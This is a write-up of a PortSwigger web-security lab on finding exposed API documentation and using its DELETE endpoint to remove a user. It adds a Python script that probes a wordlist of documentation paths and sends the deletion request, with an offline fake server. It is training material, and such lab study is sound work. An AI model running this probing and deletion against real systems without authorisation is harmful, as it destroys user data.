Lab: Exploiting an API endpoint using documentation
Link to the Lab: https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation
In this lab you will learn how to find an API endpoint. Web applications often expose their API documentation, and therefore their less obvious endpoints, at a handful of predictable paths.
If the API documentation is not linked anywhere in the application, that does not mean it doesn't exist.
To find API endpoints you can use the scanner built into Burp Suite, fuzz for endpoints with a wordlist, or browse the application and look for them manually. A 401, 403 or 405 response to a guessed path is still a lead: it tells you the path exists even if you are not allowed to use it yet.
Typical paths look like /api
or /api/users/
and so on.
Solution to this lab:
Step 1: Access the lab.
Step 2: Append the path /api to the lab URL.
You will get the API documentation screen.
It lists three methods for the user endpoint: GET, DELETE and PATCH. Click DELETE, enter the username carlos, and send the request.
The lab will be solved.
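As an added example that is not part of the original post or the lab itself, the script below puts both halves of the write-up into code: a wordlist probe that reports which candidate documentation paths respond with something other than 404, and a helper that issues the DELETE once the endpoint is known. The candidate wordlist, the host name https://lab.example and the in-memory fake server are all constructed here so the script runs offline; the user endpoint shape /api/user/{username} is assumed from the lab's documentation page and must be adjusted to whatever the documentation you discover actually lists. Swap `fake_fetcher` for `live_fetcher(...)` to run it against a real target you are authorised to test.

```python
"""Discover API documentation paths with a wordlist, then call the exposed DELETE.

Added example, not the lab's or PortSwigger's code. Assumptions: WORDLIST is
a constructed list of common documentation locations; the target host, session
cookie and /api/user/{username} endpoint shape are placeholders.
"""
from typing import Callable, Dict, List, Tuple
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from urllib.request import Request, urlopen

# Constructed wordlist: places API docs and endpoints commonly live.
WORDLIST = [
    "/api", "/api/", "/api/v1", "/api/v2", "/api/users", "/api/user",
    "/swagger", "/swagger.json", "/swagger-ui.html", "/openapi.json",
    "/api-docs", "/docs", "/graphql",
]

# Anything but "not found" is worth a closer look; 401/403/405 mean the path
# exists but the request lacked auth or used the wrong method.
INTERESTING = {200, 201, 204, 301, 302, 307, 308, 401, 403, 405}

# A fetcher takes (method, url) and returns (status, body). Injecting it keeps
# the probing logic testable without a network.
Fetcher = Callable[[str, str], Tuple[int, str]]


def live_fetcher(session_cookie: str = "") -> Fetcher:
    """Real fetcher on urllib. Pass the lab's session cookie for authenticated calls."""
    def fetch(method: str, url: str) -> Tuple[int, str]:
        req = Request(url, method=method, headers={"User-Agent": "api-probe"})
        if session_cookie:
            req.add_header("Cookie", f"session={session_cookie}")
        try:
            with urlopen(req, timeout=10) as resp:
                return resp.status, resp.read(512).decode(errors="replace")
        except HTTPError as e:
            return e.code, e.read(512).decode(errors="replace")
        except URLError:
            return 0, ""
    return fetch


def probe_paths(base_url: str, wordlist: List[str], fetch: Fetcher) -> Dict[str, int]:
    """GET every candidate path; return {path: status} for the interesting ones."""
    base = base_url.rstrip("/")
    found: Dict[str, int] = {}
    for path in wordlist:
        status, _body = fetch("GET", base + path)
        if status in INTERESTING:
            found[path] = status
    return found


def delete_user(base_url: str, username: str, fetch: Fetcher) -> int:
    """Send DELETE to the documented user endpoint (assumed /api/user/{username})."""
    status, _body = fetch("DELETE", f"{base_url.rstrip('/')}/api/user/{username}")
    return status


# --- Constructed fake server so the example runs offline -------------------
FAKE_USERS = {"carlos", "wiener"}  # constructed state; DELETE removes entries


def fake_fetcher(method: str, url: str) -> Tuple[int, str]:
    """Minimal stand-in for the lab: docs at /api, users at /api/user/{name}."""
    path = urlparse(url).path
    if method == "GET" and path == "/api":
        return 200, "API documentation: GET/DELETE/PATCH /api/user/{username}"
    if path.startswith("/api/user/"):
        name = path[len("/api/user/"):]
        if name not in FAKE_USERS:
            return 404, '{"error":"Not found"}'
        if method == "GET":
            return 200, f'{{"username":"{name}"}}'
        if method == "DELETE":
            FAKE_USERS.discard(name)
            return 200, '{"message":"User deleted"}'
        return 405, '{"error":"Method not allowed"}'
    return 404, "Not found"


if __name__ == "__main__":
    base = "https://lab.example"  # placeholder host
    hits = probe_paths(base, WORDLIST, fake_fetcher)
    for p, s in hits.items():
        print(f"{s} {base}{p}")
    print("DELETE carlos ->", delete_user(base, "carlos", fake_fetcher))
```

The probe deliberately keeps 401/403/405 responses: on a real target those are the hints that an endpoint exists behind authentication or only accepts another method, which is exactly the situation where reading the discovered documentation tells you what to send next.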
Thank you for reading.